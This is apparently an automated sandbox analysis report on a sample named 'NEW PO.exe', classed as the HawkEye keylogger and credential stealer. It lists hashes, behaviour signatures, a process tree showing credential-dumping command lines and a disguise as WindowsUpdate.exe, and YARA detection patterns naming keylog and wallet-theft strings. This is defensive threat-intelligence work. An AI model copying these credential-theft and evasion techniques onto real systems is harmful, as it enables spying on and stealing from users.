Play interactive tour

Edit tour

Windows Analysis Report NEW PO.exe

Overview

General Information

Sample Name:	NEW PO.exe
Analysis ID:	511007
MD5:	770f6e88b7bf3fe3aae144a5aa41dc96
SHA1:	ed96d179403ab319da62c092a817a5ebeea8c3da
SHA256:	08187be5bb78da6c7751c5d870d46e43e6b4204db6abf2cc2d80e9830fd136ba
Tags:	exehawkeye
Infos:
Most interesting Screenshot:

Detection

HawkEye MailPassView

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected MailPassView

Yara detected HawkEye Keylogger

Yara detected AntiVM3

Malicious sample detected (through community Yara rule)

Detected HawkEye Rat

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

May check the online IP address of the machine

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Sample uses process hollowing technique

Installs a global keyboard hook

Writes to foreign memory regions

.NET source code references suspicious native API functions

Contains functionality to log keystrokes (.Net Source)

Contains functionality to register a low level keyboard hook

Changes the view of files in windows explorer (hidden files and folders)

Yara detected WebBrowserPassView password recovery tool

Machine Learning detection for dropped file

Tries to steal Instant Messenger accounts or passwords

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Checks if the current process is being debugged

Launches processes in debugging mode, may be used to hinder debugging

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May infect USB drives

Found potential string decryption / allocating functions

Contains functionality to call native functions

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Uses SMTP (mail sending)

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

NEW PO.exe (PID: 7156 cmdline: 'C:\Users\user\Desktop\NEW PO.exe' MD5: 770F6E88B7BF3FE3AAE144A5AA41DC96)

NEW PO.exe (PID: 6044 cmdline: C:\Users\user\Desktop\NEW PO.exe MD5: 770F6E88B7BF3FE3AAE144A5AA41DC96)

vbc.exe (PID: 6692 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

vbc.exe (PID: 6728 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

WerFault.exe (PID: 6724 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 2424 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WindowsUpdate.exe (PID: 6976 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: 770F6E88B7BF3FE3AAE144A5AA41DC96)

WindowsUpdate.exe (PID: 7120 cmdline: C:\Users\user\AppData\Roaming\WindowsUpdate.exe MD5: 770F6E88B7BF3FE3AAE144A5AA41DC96)

WindowsUpdate.exe (PID: 4816 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: 770F6E88B7BF3FE3AAE144A5AA41DC96)

WindowsUpdate.exe (PID: 3996 cmdline: C:\Users\user\AppData\Roaming\WindowsUpdate.exe MD5: 770F6E88B7BF3FE3AAE144A5AA41DC96)

vbc.exe (PID: 6828 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

vbc.exe (PID: 5076 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

WerFault.exe (PID: 6008 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 2412 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5028 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 2412 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x25f8:$hawkstr1: HawkEye Keylogger 0x2088:$hawkstr2: Dear HawkEye Customers! 0x21b6:$hawkstr3: HawkEye Logger Details:
00000007.00000000.320473195.0000000007EE0000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000012.00000000.400119443.000000000359A000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.400119443.000000000359A000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7230:$hawkstr1: HawkEye Keylogger 0xc090:$hawkstr1: HawkEye Keylogger 0xc0f0:$hawkstr2: Dear HawkEye Customers! 0x126:$hawkstr3: HawkEye Logger Details:
00000012.00000002.439571003.0000000008640000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000007.00000000.318319979.0000000002DF6000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.313426139.0000000003AA1000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000000.313426139.0000000003AA1000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x105d9:$key: HawkEyeKeylogger 0x12857:$salt: 099u787978786 0x10c36:$string1: HawkEye_Keylogger 0x11a89:$string1: HawkEye_Keylogger 0x127b7:$string1: HawkEye_Keylogger 0x1101f:$string2: holdermail.txt 0x1103f:$string2: holdermail.txt 0x10f61:$string3: wallet.dat 0x10f79:$string3: wallet.dat 0x10f8f:$string3: wallet.dat 0x1237b:$string4: Keylog Records 0x12693:$string4: Keylog Records 0x128af:$string5: do not script --> 0x105c1:$string6: \pidloc.txt 0x1064f:$string7: BSPLIT 0x1065f:$string7: BSPLIT
0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x10c8e:$hawkstr1: HawkEye Keylogger 0x11acf:$hawkstr1: HawkEye Keylogger 0x11dfe:$hawkstr1: HawkEye Keylogger 0x11f59:$hawkstr1: HawkEye Keylogger 0x120bc:$hawkstr1: HawkEye Keylogger 0x12353:$hawkstr1: HawkEye Keylogger 0x10800:$hawkstr2: Dear HawkEye Customers! 0x11e51:$hawkstr2: Dear HawkEye Customers! 0x11fa8:$hawkstr2: Dear HawkEye Customers! 0x1210f:$hawkstr2: Dear HawkEye Customers! 0x10921:$hawkstr3: HawkEye Logger Details:
00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000A.00000000.316195444.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x25f8:$hawkstr1: HawkEye Keylogger 0x2088:$hawkstr2: Dear HawkEye Customers! 0x21b6:$hawkstr3: HawkEye Logger Details:
00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000012.00000000.395440509.0000000008660000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000012.00000000.395401347.0000000008640000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000007.00000002.366905535.0000000007C60000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000016.00000002.420264771.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000012.00000000.399998942.000000000358E000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.399998942.000000000358E000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x25f8:$hawkstr1: HawkEye Keylogger 0x2088:$hawkstr2: Dear HawkEye Customers! 0x21b6:$hawkstr3: HawkEye Logger Details:
00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000016.00000000.398239322.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000000.392059792.00000000035EA000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.317941479.0000000002D6A000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000A.00000000.317013131.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000002.436080566.00000000042D1000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000002.436080566.00000000042D1000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000002.435142271.000000000330F000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000002.435142271.000000000330F000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x88f4:$hawkstr1: HawkEye Keylogger 0xc690:$hawkstr1: HawkEye Keylogger 0xd368:$hawkstr1: HawkEye Keylogger 0xd6e8:$hawkstr1: HawkEye Keylogger 0xe058:$hawkstr1: HawkEye Keylogger 0x8384:$hawkstr2: Dear HawkEye Customers! 0xa7a8:$hawkstr2: Dear HawkEye Customers! 0xd3c8:$hawkstr2: Dear HawkEye Customers! 0xd748:$hawkstr2: Dear HawkEye Customers! 0x84b2:$hawkstr3: HawkEye Logger Details: 0xa8d2:$hawkstr3: HawkEye Logger Details:
00000012.00000000.408411000.0000000008640000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x4a2429:$key: HawkEyeKeylogger 0x524449:$key: HawkEyeKeylogger 0x4a46a7:$salt: 099u787978786 0x5266c7:$salt: 099u787978786 0x4a2a86:$string1: HawkEye_Keylogger 0x4a38d9:$string1: HawkEye_Keylogger 0x4a4607:$string1: HawkEye_Keylogger 0x524aa6:$string1: HawkEye_Keylogger 0x5258f9:$string1: HawkEye_Keylogger 0x526627:$string1: HawkEye_Keylogger 0x4a2e6f:$string2: holdermail.txt 0x4a2e8f:$string2: holdermail.txt 0x524e8f:$string2: holdermail.txt 0x524eaf:$string2: holdermail.txt 0x4a2db1:$string3: wallet.dat 0x4a2dc9:$string3: wallet.dat 0x4a2ddf:$string3: wallet.dat 0x524dd1:$string3: wallet.dat 0x524de9:$string3: wallet.dat 0x524dff:$string3: wallet.dat 0x4a41cb:$string4: Keylog Records
0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x4a2ade:$hawkstr1: HawkEye Keylogger 0x4a391f:$hawkstr1: HawkEye Keylogger 0x4a3c4e:$hawkstr1: HawkEye Keylogger 0x4a3da9:$hawkstr1: HawkEye Keylogger 0x4a3f0c:$hawkstr1: HawkEye Keylogger 0x4a41a3:$hawkstr1: HawkEye Keylogger 0x524afe:$hawkstr1: HawkEye Keylogger 0x52593f:$hawkstr1: HawkEye Keylogger 0x525c6e:$hawkstr1: HawkEye Keylogger 0x525dc9:$hawkstr1: HawkEye Keylogger 0x525f2c:$hawkstr1: HawkEye Keylogger 0x5261c3:$hawkstr1: HawkEye Keylogger 0x4a2650:$hawkstr2: Dear HawkEye Customers! 0x4a3ca1:$hawkstr2: Dear HawkEye Customers! 0x4a3df8:$hawkstr2: Dear HawkEye Customers! 0x4a3f5f:$hawkstr2: Dear HawkEye Customers! 0x524670:$hawkstr2: Dear HawkEye Customers! 0x525cc1:$hawkstr2: Dear HawkEye Customers! 0x525e18:$hawkstr2: Dear HawkEye Customers! 0x525f7f:$hawkstr2: Dear HawkEye Customers! 0x4a2771:$hawkstr3: HawkEye Logger Details:
00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000007.00000000.315132026.0000000007C60000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
